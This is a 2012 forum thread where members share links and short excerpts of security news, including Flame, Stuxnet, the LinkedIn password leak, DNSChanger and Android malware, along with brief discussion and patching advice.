http://blog.heritage.org/2012/05/29/doj-hack-emphasizes-the-need-for-smart-cybersecurity-action/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+FoundryConservativePolicyNews+%28The+Foundry%3A+Conservative+Policy+News.%29
***
-
Critical vulnerability derails Ruby on Rails
http://www.h-online.com/security/news/item/Critical-vulnerability-derails-Ruby-on-Rails-1588773.html
-
Obama,Cyber attacks againast Iran and Stuxnet
http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=2&hp
-
Big ongoing malware campaign - Detected BlackHole exploit kit HTTP GET request -- Detected malicious injected iframe -
flagged by urlQuery.net scan alerts,
Google for instance for this search query for the iFrame source url: htxp%3A%2F%2Fmazdaforumi.ru%3A8080%2Fforum%2Fshowthread.php%3Fpage%3D5fa58bce769e5c2c
and you will find a lot of sites that were infected recently...
also see: htxp://blog.dynamoo.com/2012/06/linkedin-spam-immerialtvru.html (link source article from The LinkedIn Team)
Reported to virus AT avast dot com,
polonus
-
Meet the little box that could stop Flame and Stuxnet
http://news.cnet.com/8301-1009_3-57443738-83/meet-the-little-box-that-could-stop-flame-and-stuxnet/
-
Lots of Dutch users targeted by LicenseValidator.ex- , see: http://www.threatexpert.com/report.aspx?md5=5ae919b80bbec754f2e98c2d28ae5628
See: http://www.symantec.com/security_response/writeup.jsp?docid=2012-051102-1813-99&tabid=2
This trojan is a HTTPS-proxy infostealer, especially Firefox, Opera, maxton and IE browsers are infected via a Blackhole Exploit kit or an infected attachment,
polonus
-
Why antivirus companies like mine failed to catch Flame and Stuxnet
http://arstechnica.com/security/2012/06/why-antivirus-companies-like-mine-failed-to-catch-flame-and-stuxnet/
-
http://www.pcadvisor.co.uk/news/software/3361791/microsoft-throws-kill-switch-on-own-certificates-after-flame-hijack/
Microsoft throws 'kill switch' on own certificates after Flame hijack.
(wondered why I got a Microsoft Update today)
-
***
Attackers Hit Weak Spots in 2-Factor Authentication
An attack late last week that compromised the personal and business Gmail accounts of Matthew Prince, chief executive of Web content delivery system CloudFlare, revealed a subtle but dangerous security flaw in the 2-factor authentication process used in Google Apps for business customers. Google has since fixed the glitch, but the incident offers a timely reminder that two-factor authentication schemes are only as secure as their weakest component.
http://krebsonsecurity.com/2012/06/attackers-target-weak-spots-in-2-factor-authentication/
***
-
***
6.46 million LinkedIn passwords leaked online
More than 6.4 million LinkedIn passwords have leaked to the Web after an apparent hack. Though some login details are encrypted, all users are advised to change their passwords.
A user on a Russian forum has claimed to have downloaded 6.46 million user hashed passwords from LinkedIn.
It looks as though some of the weaker passwords — around 300,000 of them — may have been cracked already. Other users have been seen reaching out to fellow hackers in an apparent bid to seek help in cracking the encryption.
Finnish security firm CERT-FI is warning that the hackers may have access to user email addresses also, though they appear encrypted and unreadable.
http://www.zdnet.com/blog/btl/646-million-linkedin-passwords-leaked-online/79290
***
-
***
The world's worst password requirements list
The Attorney General of Texas Child Support website has the worst set of password requirements I've ever seen.
Here's another bad password policy, courtesy of TechRepublic:
... here's ING's 4-digit PIN login:
This one from the US Citizenship and Immigration Services site is very similar to the Texas one.
Is there a consultant somewhere telling state and federal governments how not to do passwords?
Please click the below the link to see explanations of the above statements.
http://kottke.org/12/06/the-worlds-worst-password-requirements-list
***
-
***
Facebook Security Team Warns Users About DNSChanger Malware
The security team at the world’s most populace social network over in Palo Alto, Calif., finally addressed the thorny issue of the DNSChanger malware to its users in a blog post on the Facebook Security page yesterday.
To the uninitiated, DNSChanger started popping up in security headlines earlier this year when it was targeted as part of an international botnet-takedown campaign dubbed "Operation Ghost Click." It has since proven itself to be a tenacious adversary with some in the industry believing that it may be impossible to completely scrub the Internet of DNSChanger.
... Facebook’s security team warns that users infected by DNSChanger will be shown ... warning message (which looks ominously similar to any number of Facebook scams) ...
Facebook notes that any individuals (not just those on Facebook) that fail to remove DNSChanger by the July 9th deadline may lose access to the Internet altogether.
You can find instructions on how to remove DNSChanger on the DCWG website ... http://www.dcwg.org/
http://threatpost.com/en_us/blogs/facebook-security-team-warns-users-about-dnschanger-malware-060512
***
-
***
Microsoft Patches Digital Certificate Issue Exploited by Flame
The minds behind the Flame attacks signed components of the malware with an unauthorized digital certificate to make it appear as though the code had been legitimately signed by Microsoft.
Microsoft issued an update June 3 to address a certificate issue exploited in the Flame malware attacks.
Flame, which was publicized by security researchers last week, is a cyber-espionage toolkit that incorporates a wide range of functionality, including intercepting Web traffic, recording audio and taking screenshots.
According to Microsoft, components of Flame were signed with an unauthorized digital certificate that chained up to a Microsoft sub-certification authority issued under the Microsoft Root Authority. This happened via the Terminal Server Licensing Service, which Microsoft operates to issue certificates to customers for "ancillary PKI- [public-key infrastructure-] based functions" in their enterprise.
By signing malware with fake certificates, attackers can trick browsers and applications into trusting malicious content, enabling activities such as phishing and man-in-the-middle attacks.
http://www.eweek.com/c/a/Security/Microsoft-Patches-Digital-Certificate-Flaw-Exploited-by-Flame-237271/?kc=EWKNLEDP06062012B
***
-
6.46 million LinkedIn passwords leaked online
http://www.h-online.com/security/news/item/LinkedIn-passwords-in-circulation-Update-1612022.html
http://arstechnica.com/security/2012/06/8-million-leaked-passwords-connected-to-linkedin/
http://www.h-online.com/security/features/Comment-LinkedIn-and-its-password-problems-1612877.html
-
***
Microsoft Patches Digital Certificate Issue Exploited by Flame
The minds behind the Flame attacks signed components of the malware with an unauthorized digital certificate to make it appear as though the code had been legitimately signed by Microsoft.
Microsoft issued an update June 3 to address a certificate issue exploited in the Flame malware attacks.
Flame, which was publicized by security researchers last week, is a cyber-espionage toolkit that incorporates a wide range of functionality, including intercepting Web traffic, recording audio and taking screenshots.
According to Microsoft, components of Flame were signed with an unauthorized digital certificate that chained up to a Microsoft sub-certification authority issued under the Microsoft Root Authority. This happened via the Terminal Server Licensing Service, which Microsoft operates to issue certificates to customers for "ancillary PKI- [public-key infrastructure-] based functions" in their enterprise.
By signing malware with fake certificates, attackers can trick browsers and applications into trusting malicious content, enabling activities such as phishing and man-in-the-middle attacks.
http://www.eweek.com/c/a/Security/Microsoft-Patches-Digital-Certificate-Flaw-Exploited-by-Flame-237271/?kc=EWKNLEDP06062012B
***
http://www.pcadvisor.co.uk/news/software/3361791/microsoft-throws-kill-switch-on-own-certificates-after-flame-hijack/
Microsoft throws 'kill switch' on own certificates after Flame hijack.
(wondered why I got a Microsoft Update today)
-
Microsoft Security Bulletin Advance Notification for June 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-jun
-
Oracle Java SE Critical Patch Update Pre-Release Announcement - June 2012
http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html
-
Flame
http://www.securelist.com/en/blog/208193566/Flame_Replication_via_Windows_Update_MITM_proxy_server
The Flame inside Stuxnet
http://www.securelist.com/en/blog/208193568/Back_to_Stuxnet_the_missing_link
-
Microsoft Security Advisory (2719615)
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2719615
-
Intel CPUs affected by VM privilege escalation exploit
http://www.h-online.com/open/news/item/Intel-CPUs-affected-by-VM-privilege-escalation-exploit-1616866.html
http://www.kb.cert.org/vuls/id/649219
-
I found this article about Flame Virus, URL: http://edition.cnn.com/2012/06/04/opinion/rushkoff-flame-virus/index.html
-
Oracle warns EBS users of auto-update to Java 7
http://www.h-online.com/security/news/item/Oracle-warns-EBS-users-of-auto-update-to-Java-7-1618753.html
https://blogs.oracle.com/stevenChan/entry/bulletin_disable_jre_auto_update
-
Firefox 13 tripped up by Flash patch
http://www.h-online.com/open/news/item/Firefox-13-tripped-up-by-Flash-patch-1619399.html
Edit: Fixed in FF 13.0.1
-
Microsoft Security Advisory (2719615)
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2719615
Exploit for unpatched IE hole released
http://www.h-online.com/security/news/item/Exploit-for-unpatched-IE-hole-released-1619732.html
-
***
Sci-Fi-Like Network Monitoring System Scans Darknet for Possible Attacks
A 3D real-time network monitoring and alert system named DAEDALUS (Direct Alert Environment for Darknet And Livenet Unified Security) was created to scan malicious packets sent by viruses inside a local network, rather than monitoring outbound traffic.
The multitude of unused IP address within local networks is called “darknet.” A self-propagating virus first looks for viable computers to infest by scanning the entire range of local IP addresses. As not all addresses are allocated, DAEDALUS can monitor when suspicious packets are broadcast through the darknet , indicating a possible malware could be scanning for victims.
http://www.hotforsecurity.com/blog/sci-fi-like-network-monitoring-system-scans-darknet-for-possible-attacks-2426.html?goback=%2Egde_1003727_member_125535181%2Egde_1003727_member_126274564
***
-
***
Intel Chips Prone to Hacks – 64-bit OSs Deemed Vulnerable
Intel CPUs are prone to hacker attacks after a vulnerability in the way they implement the SYSRET instruction was discovered in their x86-64 extension.
The vulnerability could allow hackers to execute code with kernel privileges while in a non-administrator account, or to gain control of a host operating system after escaping a virtual machine. The U.S. Computer Emergency Readiness Team (US-CERT) issued a security advisory in which it thoroughly details the vulnerability. Several x64-based operating systems like Windows 7, Windows Server 2008 R2, 64-bit FreeBSD, 64-bit NetBSD, as well as systems that include the Xen hypervisor, are exposed to this vulnerability.
“AMD processors’ SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon,” said AMD. “Therefore, this privilege escalation exposure is not applicable to any AMD processor“.
http://www.hotforsecurity.com/blog/intel-chips-prone-to-hacks-64-bit-oss-deemed-vulnerable-2377.html
***
-
CharleyO, is there a particular reason for the monster sized text ?
Those who need larger text can always Ctrl and + key to increase the size.
-
Firefox 'new tab' feature exposes users' secured info: Fix promised
http://www.theregister.co.uk/2012/06/22/firefox_new_tab_security_concerns/
-
WordPress modules holed by Uploadify
http://www.h-online.com/security/news/item/WordPress-modules-holed-by-Uploadify-1626030.html
-
Russian botnet operators infected 6 million computers (http://www.h-online.com/security/news/item/Russian-botnet-operators-infected-6-million-computers-1624906.html)
-
***
10 Security Bugs You Should Be Watching
New malware continues to arrive on the scene every day, marking an ongoing test of wills and test of technologies that pits the good guys against the bad guys ......
Some of these threats are notable because of the scale of the attack. Others, such as in the case of Stuxnet and Flame, are notorious because of the types of technologies involved ......
Here is a list of current threats to keep tabs on.
http://www.crn.com/slide-shows/security/240002606/10-security-bugs-you-should-be-watching.htm?pgno=1
***
-
***
Older means wiser to computer security
A new Dimensional Research and ZoneAlarm report found that 18 – 25s are more confident in their security knowledge than 56 – 65s, but have experienced more security issues in the past two years compared to older users.
78% of 18 – 25s respondents do not follow security best practices, while cybercriminals are launching new and more sophisticated attacks on consumers. In comparison, 56 – 65s are more concerned about security and privacy and are twice as likely to protect their computers with additional security software.
Also, 67% of UK users reported security problems in the past two years – more than any other country in the study. 57% of users in Australia reported security problems, and 50% of users in the USA, Canada and Germany reported issues.
“Growing up in the digital age, 18 – 25s may appear to be a more tech-savvy generation, but that does not translate into safer computing and online practices,” said Tomer Teller, security evangelist and researcher at Check Point Software Technologies.
“Younger users tend to prioritize entertainment and community over security, perhaps due to overconfidence in their security knowledge. For example, they’re more concerned about gaming or other social activities than their online security. They also have less sophisticated security software, and hence, have reported more security problems than other groups.”
Read more at: http://www.net-security.org/secworld.php?id=13141
***
-
***
Apple Quietly Pulls Claims of Virus Immunity
In the wake of the Flashback botnet which targeted Mac computers, Apple has removed a statement from its messages on its website that Mac operating system X (OS X) isn't susceptible to viruses.
Apple removed the previous statement "It doesn't get PC viruses" and replaced it with "It's built to be safe," and "Safeguard your data. By doing nothing" with "Safety. Built in."
Read more at: http://www.pcworld.com/article/258183/apple_quietly_pulls_claims_of_virus_immunity.html
I have been saying for many years that Apple computers were not any safer than PCs, just less exploited from being less popular.
***
-
Thanks for posting CharleyO.
-
Researchers steal keys from RSA tokens
http://www.h-online.com/security/news/item/Researchers-steal-keys-from-RSA-tokens-1626358.html
RSA says that its tokens are secure
http://www.h-online.com/security/news/item/RSA-says-that-its-tokens-are-secure-1627326.html
-
***
Facebook Email Change Raises Security Concerns
Facebook’s decision to replace users’ chosen email addresses with their Facebook email address as the default on profile pages likely will make those @facebook.com addresses even more attractive to spammers and other cyber-criminals, according to one security expert.
Facebook has been quietly shifting the default addresses of its almost 900 million users from the email addresses they chose when signing up on the site—such as those from Yahoo or Google’s Gmail—to their Facebook addresses, which are the username@facebook.com. Facebook officials in April said they were giving all their users a Facebook email address using their public usernames, but it wasn’t until this past weekend that some journalists and blog sites noticed that Facebook was making these addresses the default addresses on public profiles.
The social network, which is notorious for making blanket changes to its Website operations without sufficiently notifying its users, has come under heavy criticism from users and outside observers alike since the move was publicized. The common theme is that it’s yet another attempt by Facebook to gain greater control over its users’ lives.
Read more at : http://www.eweek.com/c/a/Security/Facebook-Email-Change-Raises-Security-Concerns-436367/?kc=EWKNLEDP06282012D
***
-
Clear cutting of news from different brands.
http://www.securelist.com/en/analysis/204792235/XPAJ_Reversing_a_Windows_x64_Bootkit
http://www.securelist.com/en/blog/208193609/The_Day_The_Stuxnet_Died
http://www.securelist.com/en/blog/208193616/New_MacOS_X_backdoor_variant_used_in_APT_attacks#page_top (MacOS:MacKontrol-A)
http://news.drweb.com/show/?i=2508&lng=en&c=9
http://news.drweb.com/?i=2516&c=5&lng=en&p=0
-
Lottery Scammers Phishing with More Sophisticated Hooks (http://www.hotforsecurity.com/blog/lottery-scammers-phishing-with-more-sophisticated-hooks-2538.html?goback=%2Egde_1003727_member_129258404)
-
***
Android-Based Spam Attack: A Smartphone Botnet In Action?
A purported botnet is targeting Android-based smartphones as a means of delivering spam. The exploit leverages the Yahoo (NSDQ:YHOO) mail accounts of the phones’ owners, and it is believed by some to be the first time that malware authors have managed to assemble an army of Android phones for the delivery of spam.
This development was first reported on Tuesday by security blogger Terry Zink who wrote that the botnet is producing “the typical pump and dump variety that we’ve seen for years.”
In each case, the messages are reported to contain the message ID, "1341147286.19774.androidMobile@web140302.mail.bf1.yahoo.com," and acknowledge being sent from Yahoo Mail on Android, at the bottom of the dispatch.
Read more at :
http://www.crn.com/news/security/240003265/android-based-spam-attack-a-smartphone-botnet-in-action.htm?cid=nl_sec
***
-
***
Microsoft Patch Tuesday Likely To Target XML Bug, IE9 Vulnerabilities
This month, the advisory specifies a total of nine bulletins, three of which are listed as critical with the remaining six listed as important.
“I expect them to fix an XML problem that they identified last month," said Wolfgang Kandek, CTO of Qualys. “This is in response to a zero-day attack that is already being used in the wild. Last Patch Tuesday, they provided a workaround. And while we recommend that people use the workaround, I'm expecting a very real patch coming out on Tuesday.”
Read more at :
http://www.crn.com/news/security/240003246/microsoft-patch-tuesday-likely-to-target-xml-bug-ie9-vulnerabilities.htm?cid=nl_sec
***
-
First ever malware app found in Apple Store
http://www.dailymail.co.uk/news/article-2170169/First-malware-app-Apple-Store.html
-
Ransomware threatens to frame user and inform police
http://www.h-online.com/security/news/item/Ransomware-threatens-to-frame-user-and-inform-police-1632338.html
-
ZeroAccess: code injection chronicles
http://blog.eset.com/2012/06/25/zeroaccess-code-injection-chronicles
All Carberp botnet organizers arrested
http://www.eset.com/about/blog/blog/article/all-carberp-botnet-organizers-arrested/
Win32/Gataka: a banking Trojan ready to take off?
http://www.eset.com/about/blog/blog/article/win32gataka-a-banking-trojan-ready-to-take-off/
-
Hi Dim@rik,
On the same threat as you alert to: http://letsbytecode.com/security/zeus-is-not-visible-to-most-anti-viruses/ link article posted by synt4x in lestbytecode - Security
polonus
-
Report: Android malware doubled in just one month
http://www.h-online.com/security/news/item/Report-Android-malware-doubled-in-just-one-month-1632587.html
-
Report: Android malware doubled in just one month
http://www.h-online.com/security/news/item/Report-Android-malware-doubled-in-just-one-month-1632587.html (http://www.h-online.com/security/news/item/Report-Android-malware-doubled-in-just-one-month-1632587.html)
Fame, Fortune and, Infection. :(
-
Google Play Fails to Remove All Super Mario Malware
https://www.f-secure.com/weblog/archives/00002398.html
-
"A new #Android #Trojan that buys applications on behalf of users has been discovered on the China Mobile Martketplace.
[/size]Dubbed MMarketPay.A, the Trojan affects Chinese users subscribed to China Mobile, one of the world’s largest mobile phone carriers."
http://www.hotforsecurity.com/blog/100000-android-users-infected-with-application-buying-trojan-2706.html?goback=%2Egde_1003727_member_132561617 (http://www.hotforsecurity.com/blog/100000-android-users-infected-with-application-buying-trojan-2706.html?goback=%2Egde_1003727_member_132561617)
Has Avast's protection for the android OS addressed this issue ???
-
I just read this article. I never use gadgets or the sidebar but I know the functionality is enabled. It looks like it's time to get rid of them.
http://www.zdnet.com/security-flaws-signal-early-death-of-windows-gadgets-7000000724/
-
Malware sniffs for Windows, Mac OS X or Linux
http://www.h-online.com/security/news/item/Malware-sniffs-for-Windows-Mac-OS-X-or-Linux-1636577.html
-
Week 26 – Facebook’s week of evil
http://blogs.norman.com/2012/for-consumption/week-26-facebooks-week-of-evil
-
***
Windows, Linux, Mac OS X Hit by Cross-Platform Malware Attack
An attack has been discovered that serves up malware for all three platforms and opens up a backdoor on victimized systems.
Windows, Linux and Mac OS X are being targeted in a cross-platform malware attack, according to security experts.
Researchers at F-Secure spotted the attack on a Colombian transport site. The attack begins with a signed Java applet and a social engineering ploy in the form of a dialog box prompting the user to run an application despite its digital certificate not being verified.
Read more at :
http://www.eweek.com/c/a/Security/Windows-Linux-Mac-OS-X-Hit-by-CrossPlatform-Malware-Attack-566009/?kc=EWKNLEDP07132012B
***
-
Over 1 million user credentials compromised in Android Forums hack
http://www.h-online.com/security/news/item/Over-1-million-user-credentials-compromised-in-Android-Forums-hack-1640164.html
-
Over 1 million user credentials compromised in Android Forums hack
http://www.h-online.com/security/news/item/Over-1-million-user-credentials-compromised-in-Android-Forums-hack-1640164.html
Because of this, we always recommend do NOT use the SAME password in all sites you login... Steal from one, steal from all others...
-
***
Nvidia: 400,000 coded passwords may have been hit
U.S. semiconductor maker Nvidia Corp. says up to 400,000 users of its forums have had their encrypted passwords compromised in attacks dating back to early July.
It's the latest in a stream of data thefts which has hit major Internet companies over the past few weeks. Search provider Yahoo, networking sites LinkedIn and FormSpring, and dating site eHarmony have all recently reported breaches which collectively compromised the online credentials of millions of users.
Read more at :
http://my.earthlink.net/article/tec?guid=20120713/79521e47-db13-4745-a779-fddac9836d4d
***
-
***
Operation Tuleta makes sixth arrest in computer hacking investigation
A 55-year-old man has been arrested in Cardiff by police from Scotland Yard's Operation Tuleta investigation into computer hacking.
The man was arrested at his home on Friday morning on suspicion of offences under the Computer Misuse Act 1990 and the Regulation of Investigatory Powers Act (Ripa) 2000.
The man is the sixth person to be arrested under Operation Tuleta, which was launched in July last year as a splinter investigation to Scotland Yard's Operation Weeting probe into phone hacking.
The Met police said the man is in custody at a police station in the Cardiff area.
Operation Tuleta is investigating the use of so-called "trojan" emails which allow a hacker to take over a target's computer.
Read more at :
http://www.guardian.co.uk/technology/2012/jul/13/operation-tuleta-arrest-computer-hacking
***
-
***
Wi-fi hacking in Seattle cost businesses $3 million
Wireless computer hacking of identity theft and payroll thefts totalling more than $3 million dollars in Seattle has landed the last defendant in federal prison.
Joshuah Allen Witt, 35, was found guilty with two other defendants for hacking into 50 businesses software using a wi-fi receiver that detects business wireless networks. They hacked into the security codes and accessed company computers, according to the Seattle Times online edition.
Read more at :
http://www.examiner.com/article/wi-fi-hacking-seattle-cost-businesses-3-million?cid=rss
***
-
Oracle Critical Patch Update Pre-Release Announcement - July 2012
http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
-
***
Microsoft Disables Windows Sidebar, Gadgets Due to Security Risk
The software company has released a security update that shuts off the desktop feature out of concerns that hackers could get into a user’s system.
Microsoft has issued a security advisory urging users to install an update that disables the Sidebar and Gadgets features on Windows Vista and Windows 7 operating systems due to a potential security vulnerability.
The security advisory warns that a hacker could get into a user’s system through an insecure Gadget running in Sidebar, execute arbitrary code and wreak havoc on the system. The Sidebar, as its name implies, is a section of the desktop real estate that lies to one side of the screen. Gadgets running in Sidebar are various tools, created with small amounts of code, which a user can see at a glance while working on their computer, such as a clock, the local temperature, a news headline feed or a stock ticker.
Read more at :
http://www.eweek.com/c/a/Security/Microsoft-Disables-Windows-Sidebar-Gadgets-Due-to-Security-Risk-643712/?kc=EWKNLEDP07162012B
***
-
Skype confirms privacy bug that sends IMs to unintended recipients
http://www.h-online.com/security/news/item/Skype-confirms-privacy-bug-that-sends-IMs-to-unintended-recipients-1643401.html
-
***
Worst Security Snafus of 2012 -- So Far
From the embarrassing hack of a conversation between the FBI and Scotland Yard to a plethora of data breaches, security snafus have ruled the first half of 2012. Here's a look at some of the worst snafus month-by-month.
Read more at :
http://www.pcworld.com/article/259258/a_look_at_the_worst_security_snafus_of_2012_so_far.html
***
-
World of Warcraft Scams, read more: http://blog.trendmicro.com/world-of-warcraft-scams-mist-of-pandaria-free-mounts-and-phishing-galore/
link article author: Menard Osena (Solutions Product Manager),
polonus
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
At least it will mean the end of Complity and Vshare malware
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
If you want to discuss this, please open a new topic. (Maybe in the ECC..)
-
Google blocks Chrome extensions from third party servers
http://www.h-online.com/security/news/item/Google-blocks-Chrome-extensions-from-third-party-servers-1643537.html
Does that mean the end of WebRep in Chrome?
If you want to discuss this, please open a new topic. (Maybe in the ECC..)
Oh come on, it was a simple question. A yes or no answer shouldn't be too hard.
-
New 'Madi' cyber-espionage campaign targets Iran AND Israel
Attackers 'fluent in Persian', say security sinkholers
http://www.theregister.co.uk/2012/07/17/madi_cyber_espionage_campaign/
-
Facebook again......
Fake Facebook photo tag ruse smears malware on PCs
http://www.theregister.co.uk/2012/07/19/facebook_photo_tag_malware_ruse/
-
Urgent security update for TeamViewer
http://www.h-online.com/security/news/item/Urgent-security-update-for-TeamViewer-1648586.html
-
New 'Madi' cyber-espionage campaign targets Iran AND Israel
Attackers 'fluent in Persian', say security sinkholers
http://www.theregister.co.uk/2012/07/17/madi_cyber_espionage_campaign/
more Madi
Iran: If the Madi cyber-strike was us it would've been another Stuxnet
http://www.theregister.co.uk/2012/07/20/madi_cyberspy_analysis/
-
Spam attack on Dropbox users
http://www.h-online.com/security/news/item/Spam-attack-on-Dropbox-users-1646660.html
-
Oracle Critical Patch Update Pre-Release Announcement - July 2012
http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
No patch for critical Oracle database vulnerability
http://www.h-online.com/security/news/item/No-patch-for-critical-Oracle-database-vulnerability-1649106.html
-
***
8 Million Email Addresses And Passwords Spilled From Gaming Site Gamigo Months After Hacker Breach
Call it a slow leak. Four months after the gaming site Gamigo warned users about a hacker intrusion that accessed some portions of its users’ credentials, more than 8 million usernames, emails and and encrypted passwords from the site have been published on the Web, according to the data breach alert service PwnedList. The half-gigabyte collection of stolen user data was posted to the password-cracking forum Inside Pro earlier this month, where it remained online until late last week.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/07/23/eight-million-passwords-spilled-from-gaming-site-gamigo-months-after-breach/
***
-
***
Hacker Will Expose Potential Security Flaw In Four Million Hotel Room Keycard Locks
The next time you stay in a hotel room, run your fingers under the keycard lock outside your door. If you find a DC power port there, take note: With a few hacker tricks and a handful of cheap hardware, that tiny round hole might offer access to your room just as completely as your keycard.
At the Black Hat security conference Tuesday evening, a Mozilla software developer and 24-year old security researcher named Cody Brocious plans to present a pair of vulnerabilities he’s discovered in hotel room locks from the manufacturer Onity, whose devices are installed on the doors of between four and five million hotel rooms around the world according to the company’s figures. Using an open-source hardware gadget Brocious built for less than $50, he can insert a plug into that DC port and sometimes, albeit unreliably, open the lock in a matter of seconds. “I plug it in, power it up, and the lock opens,” he says simply.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/07/23/hacker-will-expose-potential-security-flaw-in-more-than-four-million-hotel-room-keycard-locks/
***
-
***
ATM Skimmers Get Wafer Thin
It’s getting harder to detect some of the newer ATM skimmers, fraud devices attached to or inserted into cash machines and designed to steal card and PIN data. Among the latest and most difficult-to-spot skimmer innovations is a wafer-thin card reading device that can be inserted directly into the ATM’s card acceptance slot.
See and read more at :
http://krebsonsecurity.com/2012/07/atm-skimmers-get-wafer-thin/
***
-
Hack Reveals Security Flaw with In-App Purchases
http://www.ign.com/articles/2012/07/14/hack-reveals-security-flaw-with-in-app-purchases
A Hack has been found to enable free in app purchases from the App Store for iOS Devices
-
***
Warning: Battery-saver app on Android is malware
A new piece of malware is trying to take advantage of poor battery life on Android smartphones. Cybercriminals have created an app that is supposed to reduce battery use, but in reality steals the user's contacts data stored on the device.
Android.Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location. The Trojan may arrive as a package with the following name: BatteryLong.apk.
See and read more at :
http://www.zdnet.com/warning-battery-saver-app-on-android-is-malware-7000001483/
***
-
***
Mom arrested for hacking school computers, tweaking her kids' grades
A US mother is facing six felony counts for allegedly hacking into her children's school computer, changing their grades, and accessing the school's human resources system to open thousands of personnel files that contained contracts, employee reports and other information.
Venusto is accused of changing her daughter's grade from an F to an M for "medical," of allegedly boosting her son's grade of 98 percent to 99 percent, and of using the superintendent's information to log onto the district email system and to access Northwestern Lehigh's human resources system.
Read more at :
http://nakedsecurity.sophos.com/2012/07/23/mom-hacking-school-grades/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
-
***
Hacker Will Expose Potential Security Flaw In Four Million Hotel Room Keycard Locks
The next time you stay in a hotel room, run your fingers under the keycard lock outside your door. If you find a DC power port there, take note: With a few hacker tricks and a handful of cheap hardware, that tiny round hole might offer access to your room just as completely as your keycard.
At the Black Hat security conference Tuesday evening, a Mozilla software developer and 24-year old security researcher named Cody Brocious plans to present a pair of vulnerabilities he’s discovered in hotel room locks from the manufacturer Onity, whose devices are installed on the doors of between four and five million hotel rooms around the world according to the company’s figures. Using an open-source hardware gadget Brocious built for less than $50, he can insert a plug into that DC port and sometimes, albeit unreliably, open the lock in a matter of seconds. “I plug it in, power it up, and the lock opens,” he says simply.
Sometimes you don't even have to go high-tech. A few years ago when they were doing major roofing work on our apartment building (we're on the top floor), the management moved us to a nearby hotel for the weekend. At one point I'd gone downstairs there (breakfast, maybe?), and because for some reason the room numbers didn't correspond with the floor they were on, coming back up I got off the elevator on the wrong floor.
My card opened "our" room just fine, and it was only when I didn't see any of our belongings that I realized my error. Fortunately the room was unoccupied -- I'm guessing the hotel left unbooked rooms unlocked for the convenience of cleaning and other staff.
-
Hi friends,
Be aware that this could become a real threat: http://community.websense.com/blogs/securitylabs/archive/2012/07/20/a-malware-very-social-and-ready-for-the-olympic-games.aspx (link post author = Gianluca Giuliani). Don't say we did not warn you to watch your clicks,
polonus
-
Keep your java up to date, go here to check: http://www.java.com/en/download/installed.jsp
Gigantic increase in java based malware recently.
See: http://blogs.technet.com/b/mmpc/archive/2012/07/25/how-to-protect-yourself-from-java-based-malware.aspx
(link article author = MS's Jeong Wook, Microsoft Malware Protection Center,
polonus
-
Keep your java up to date, go here to check: http://www.java.com/en/download/installed.jsp
Gigantic increase in java based malware recently.
See: http://blogs.technet.com/b/mmpc/archive/2012/07/25/how-to-protect-yourself-from-java-based-malware.aspx
(link article author = MS's Jeong Wook, Microsoft Malware Protection Center,
polonus
No Java here for a long time...!!
Funny thing is that most users don't even know that most of them don't need it at all... ;)
-
Hi Asyn,
What would help would be the extra click to allow it to run in a browser. I hope that will be brought in. Some browsers will keep it up to date for you, and the cases where you need the java functionality (specific scanners and applications) are becoming rare,
polonus
-
Spoofed google bots from non-google IPs trying to insert malcode, see: http://www.incapsula.com/the-incapsula-blog/item/369-was-that-really-a-google-bot-crawling-my-site (link article source incapsula) - validate user agent and used IP's is the advice incapsula team gives,
polonus
-
Hi Asyn,
What would help would be the extra click to allow it to run in a browser. I hope that will be brought in. Some browsers will keep it up to date for you, and the cases where you need the java functionality (specific scanners and applications) are becoming rare,
polonus
Firefox 14's new click-to-play feature does just that, requires the extra click to permit applets to load and run. I only need Java on one game site, and someone over at the MS forums was nice enough to show me how to grant ongoing permission on a per-site basis.
-
Hi MikeBCda,
Thanks for the feed-back, It helps the discussion and informs us all. I appreciate that.
In GoogleChrome I have Better Pop Up Blocker installed that sort of gives me the same functionality, when you have to allow an applet to run.
And we need to be cautious as MS found up 96 leaks in third party software during the last twelve months, of which 63% has not been patched yet.
See: http://download.microsoft.com/download/B/D/B/BDB57917-D70B-41C3-9948-C5C0C67875D4/MSRC%20Progress%20Report%202012.pdf
(link source: MSVR)
pol
-
Keep a finger on the pulse: http://www.securitywizardry.com/radar.htm
polonus
-
Persistent router botnets on the horizon. Your router can be hacked and backdoored, device fingerprinting scripts for network devices via a webbrowser are already available, see: http://www.computerworld.com/s/article/9229775/Persistent_router_botnets_on_the_horizon_researcher_says_at_Defcon
IDG news service link article author = Lucian Constantin
polonus
-
Oi, missile boffins! Stop ogling web filth at work - Pentagon
http://www.theregister.co.uk/2012/08/02/smut_warning_missile_defense_agency/
;D
Pentagon top brass have ordered missile defence boffins to stop using government computers to surf for porn.
-
Facebook has more than 83 million illegitimate accounts
http://www.bbc.com/news/technology-19093078
-
I know of a country that seems to have that same problem with it's citizens. :D
-
